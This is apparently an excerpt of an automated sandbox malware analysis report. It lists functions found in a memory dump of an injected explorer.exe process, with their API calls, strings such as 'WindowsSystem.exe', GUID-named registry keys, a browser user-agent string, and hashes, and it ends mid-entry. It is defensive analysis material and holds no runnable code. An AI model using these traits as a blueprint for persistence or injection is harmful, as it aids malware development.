                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFreeLocallstrlen$Attributes$AllocDeleteDirectoryFolderKnownPathRemoveTask_errno_invalid_parameter_noinfo
                                                                                                            • String ID: %s%s$WindowsSystem.exe
                                                                                                            • API String ID: 2317434139-4151400913
                                                                                                            • Opcode ID: 1416f4c1b8bfc263e6edc9f5aa8eccf88895dd98b75af6870fdf466bacd7e51a
                                                                                                            • Instruction ID: 27fd846804d3f5deef8a22a70aed1196e3901088cf646ec8e603bbde82bdd442
                                                                                                            • Opcode Fuzzy Hash: 1416f4c1b8bfc263e6edc9f5aa8eccf88895dd98b75af6870fdf466bacd7e51a
                                                                                                            • Instruction Fuzzy Hash: 9D2141212249C491D770DB24F99839A73A0F7D4B55F901A32D69E93AF4EF3DC599CB00
                                                                                                            Function 00E257B0 Relevance: 13.6, APIs: 9, Instructions: 57memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalUninitialize$AllocCreateFreeFromGuidInitializeStringund_memcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3539965953-0
                                                                                                            • Opcode ID: 95a77f028184b52904f9620fb9d0f05d06bea14b2b953f3118e62dd5adf3fbc4
                                                                                                            • Instruction ID: 171dd5f0686b5790e4d7f464f593726a60d7d13c5c92ed22f143929e1c8bfb4c
                                                                                                            • Opcode Fuzzy Hash: 95a77f028184b52904f9620fb9d0f05d06bea14b2b953f3118e62dd5adf3fbc4
                                                                                                            • Instruction Fuzzy Hash: B4215E32328BC482DB74DB25F95439E63A1FBD5B80F405425D98AA7A68CF7DC548CB40
                                                                                                            Function 00E047C0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 245synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, xrefs: 00E04A1A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocalObjectSingleWait
                                                                                                            • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                                            • API String ID: 2302018356-4002695862
                                                                                                            • Opcode ID: bf519136ccd4abf063f206afac4ce43c27d6987f6cd99cde0c11dd423466edb2
                                                                                                            • Instruction ID: c015579a4bdb99481165d56befd727eaaebc0b5f3cfd3fdbd00b25c14e2e662d
                                                                                                            • Opcode Fuzzy Hash: bf519136ccd4abf063f206afac4ce43c27d6987f6cd99cde0c11dd423466edb2
                                                                                                            • Instruction Fuzzy Hash: 53E106B6206BC0C5EB24CF04F5D53AAB3A0F7A4748F50152AD68EA67E4DB7DC185CB80
                                                                                                            Function 00E04570 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 50registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegCreateKeyExW.KERNEL32 ref: 00E045F4
                                                                                                            • RegSetValueExW.KERNEL32 ref: 00E0462B
                                                                                                            • RegCloseKey.KERNEL32 ref: 00E0463A
                                                                                                            • RegCloseKey.ADVAPI32 ref: 00E0464C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateValue_errno_invalid_parameter_noinfo
                                                                                                            • String ID: ?$SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 3235468379-2864920908
                                                                                                            • Opcode ID: 5711614ded0e062e90a3729fd925f5ac6c8927b05acfcae75dff4fb6692581c7
                                                                                                            • Instruction ID: 540c17e2497e354f265f9ef1b63e561dcba200c941fa8ae5eba89d45002a3dbf
                                                                                                            • Opcode Fuzzy Hash: 5711614ded0e062e90a3729fd925f5ac6c8927b05acfcae75dff4fb6692581c7
                                                                                                            • Instruction Fuzzy Hash: D9216D72218B84C6E750DF25F99875AB3A0F7D4794F401622EA9D93BA8EFBDC544CB00
                                                                                                            Function 00E052C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegCreateKeyExW.KERNEL32 ref: 00E05340
                                                                                                            • RegSetValueExW.KERNEL32 ref: 00E05374
                                                                                                            • RegCloseKey.ADVAPI32 ref: 00E05383
                                                                                                            • RegCloseKey.ADVAPI32 ref: 00E05395
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateValue_errno_invalid_parameter_noinfo
                                                                                                            • String ID: ?$SOFTWARE\%s${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                                                                                                            • API String ID: 3235468379-678327417
                                                                                                            • Opcode ID: ede5476453c4f99a9dd9d77d60b50a0d4b44caa61fb95a6ad4146687fa891cdb
                                                                                                            • Instruction ID: 1acfb0750104d2a66e828b73921d19ba5aeec431ddb42b36975b78b11a8c12e7
                                                                                                            • Opcode Fuzzy Hash: ede5476453c4f99a9dd9d77d60b50a0d4b44caa61fb95a6ad4146687fa891cdb
                                                                                                            • Instruction Fuzzy Hash: 57215E32218B80C2E7109F61F99875BB3A4F7947D4F901A21EA9957BA8DFBDC544CB04
                                                                                                            Function 00E0F790 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,00E167C4), ref: 00E0F7AF
                                                                                                            • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00E167C4), ref: 00E0F7C3
                                                                                                            • wnsprintfW.SHLWAPI ref: 00E0F7FC
                                                                                                            • lstrlenW.KERNEL32 ref: 00E0F80B
                                                                                                            • CoTaskMemFree.COMBASE ref: 00E0F81D
                                                                                                            • CoTaskMemFree.COMBASE ref: 00E0F82F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeTask$AllocFolderKnownLocalPathlstrlenwnsprintf
                                                                                                            • String ID: %s\%s
                                                                                                            • API String ID: 1665550476-4073750446
                                                                                                            • Opcode ID: 22d0398798acd8f4693eaf530b2968c768c5f25ad5cccc69d563900eb890bec1
                                                                                                            • Instruction ID: 13d3170be54bcd7d8fda81ab0d725b9ee0ffa65ad416130ee09d54c3861d93f8
                                                                                                            • Opcode Fuzzy Hash: 22d0398798acd8f4693eaf530b2968c768c5f25ad5cccc69d563900eb890bec1
                                                                                                            • Instruction Fuzzy Hash: BE114832628AC182E7548F14F94435A63A0FBC4B84F406822FA8A93B68DF7DC556CB00
                                                                                                            Function 00E07770 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registrymemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E0778A
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegGetValueW.KERNEL32 ref: 00E077FC
                                                                                                            • LocalFree.KERNEL32 ref: 00E07820
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 00E077A8
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00E077A1
                                                                                                            • {C3120582-398C-4F3B-A956-7E9F9DB9EF8E}, xrefs: 00E077E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$AllocFreeValue_errno_invalid_parameter_noinfo
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
                                                                                                            • API String ID: 3172112264-3858757917
                                                                                                            • Opcode ID: 60108e8e6420cc122c2957bd5de8267001585b959a6d0fefbf3756c8c20c9b2b
                                                                                                            • Instruction ID: 7330cc255ee9e6f0c697f1d3b86bd19c3a0b1f59c2471e07f32221da140cb496
                                                                                                            • Opcode Fuzzy Hash: 60108e8e6420cc122c2957bd5de8267001585b959a6d0fefbf3756c8c20c9b2b
                                                                                                            • Instruction Fuzzy Hash: B4112131618B8082E750CB54F44839A73B0F795794FA04626E7DDA3BA8DF7EC545C740
                                                                                                            Function 00E04710 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegOpenKeyW.ADVAPI32 ref: 00E0474E
                                                                                                            • RegSetValueExW.KERNEL32 ref: 00E04789
                                                                                                            • RegCloseKey.ADVAPI32 ref: 00E04798
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenValue_errno_invalid_parameter_noinfo
                                                                                                            • String ID: SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 2168760479-2357458413
                                                                                                            • Opcode ID: b277b5005de9c5819c51337204c57e9bf34851ef5143b6271afdb0f866b5614f
                                                                                                            • Instruction ID: 17f616ec3ca36b9fa528544edb0b9da667041fae0cb618f048e541bd2c6e0fa0
                                                                                                            • Opcode Fuzzy Hash: b277b5005de9c5819c51337204c57e9bf34851ef5143b6271afdb0f866b5614f
                                                                                                            • Instruction Fuzzy Hash: D3116DB6324A8192D750DF20F94479A73A0FB94780F501912A68E93BE8DF39C544CB50
                                                                                                            Function 00E1E280 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00E1E2C7
                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32 ref: 00E1E2E5
                                                                                                            • SetNamedSecurityInfoW.ADVAPI32 ref: 00E1E31E
                                                                                                            • LocalFree.KERNEL32 ref: 00E1E32D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                                                            • API String ID: 173816248-495562761
                                                                                                            • Opcode ID: 79cb27a41e6bf29be1783338148c5806ad86ba6a150287ac79480d04f9847149
                                                                                                            • Instruction ID: 8625ad1bf0b07076f1fa6360d85a04184e43042b08e5176caf3836ee7d488285
                                                                                                            • Opcode Fuzzy Hash: 79cb27a41e6bf29be1783338148c5806ad86ba6a150287ac79480d04f9847149
                                                                                                            • Instruction Fuzzy Hash: EF111732208A8182E7108F50F95474BBBB0F3C1B98F600516EAC957A68CFBEC549CB40
                                                                                                            Function 00E08EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 25registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegGetValueW.KERNEL32 ref: 00E08F1A
                                                                                                            Strings
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00E08EBC
                                                                                                            • SOFTWARE\%s, xrefs: 00E08EC3
                                                                                                            • {C2FE454F-1649-4C34-B46D-B1EE64A366C2}, xrefs: 00E08F07
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Value_errno_invalid_parameter_noinfo
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C2FE454F-1649-4C34-B46D-B1EE64A366C2}
                                                                                                            • API String ID: 4005939669-3270428146
                                                                                                            • Opcode ID: 80dc20360ca16f8f9c1a7b532d2bfb9cb957c6a06b5e9ac06e7822a6ebdcd47e
                                                                                                            • Instruction ID: 5f97d169995f27db02743952ff15873a5c49d1ad1163f3bfdac06d46e0ff2ddb
                                                                                                            • Opcode Fuzzy Hash: 80dc20360ca16f8f9c1a7b532d2bfb9cb957c6a06b5e9ac06e7822a6ebdcd47e
                                                                                                            • Instruction Fuzzy Hash: F1F06D31218B8582EB20DB60F44439A7364F794394F901622E6DC537E8DFBDC249CB40
                                                                                                            Function 00E26853 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationnetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
                                                                                                            • String ID:
                                                                                                            • API String ID: 3044467104-0
                                                                                                            • Opcode ID: af6db72d22a5a0b57c07039f707cf0efc0dc65c97e2bfbca397b748c9bcfdb65
                                                                                                            • Instruction ID: 4fb43c19361f3fbad817b5fb026b12793c71a4befc5984853dcd8b4b3ce41504
                                                                                                            • Opcode Fuzzy Hash: af6db72d22a5a0b57c07039f707cf0efc0dc65c97e2bfbca397b748c9bcfdb65
                                                                                                            • Instruction Fuzzy Hash: 9E21B832159A94C6E7369B18F4897DAB3B1F79C749F241315C2CAA2A58CF7EC455CB00
                                                                                                            Function 00E26444 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wait$ObjectSingleclosesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                                                            • String ID:
                                                                                                            • API String ID: 785092289-0
                                                                                                            • Opcode ID: 8f4642ff7b1716d754dccb156afb2504e9903691b47701658c058a50519b7d20
                                                                                                            • Instruction ID: 410246110c82fee292a429af6d6b7a4d594d7bed0348118c2a26c8760884f57a
                                                                                                            • Opcode Fuzzy Hash: 8f4642ff7b1716d754dccb156afb2504e9903691b47701658c058a50519b7d20
                                                                                                            • Instruction Fuzzy Hash: EC21B832159AD4C6E732AB18F8897DAB3B1F3DC749F241315C6CAA6A58CF7EC455CA00
                                                                                                            Function 00E04670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
